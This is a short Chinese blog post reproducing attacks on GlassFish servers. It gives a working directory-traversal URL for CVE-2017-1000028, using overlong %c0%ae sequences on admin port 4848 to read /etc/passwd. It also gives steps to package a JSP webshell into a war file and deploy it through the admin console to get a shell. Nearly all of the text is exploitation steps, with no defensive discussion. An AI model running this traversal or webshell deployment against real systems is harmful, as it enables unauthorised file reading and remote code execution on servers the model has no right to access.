GlassFish

1.漏洞复现

CVE-2017-1000028 目录穿越/任意文件读取漏洞

影响范围：GlassFish <=4.1.2

4848是管理端口，%c0%ae解析为.

访问https://IP:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

后台GetShell

将JSP一句话木马制作为war包

jar cvf shell.war shell.jsp

登录后台，路径：https://IP:4848/

Applications->deploy->上传war包

木马路径：/shell/shell.jsp(根据自己的文件名改)

posted @ 2023-01-13 03:29 Hacker&Cat 阅读(122) 评论(0) 编辑收藏举报

刷新页面返回顶部

Hacker&Cat

GlassFish

公告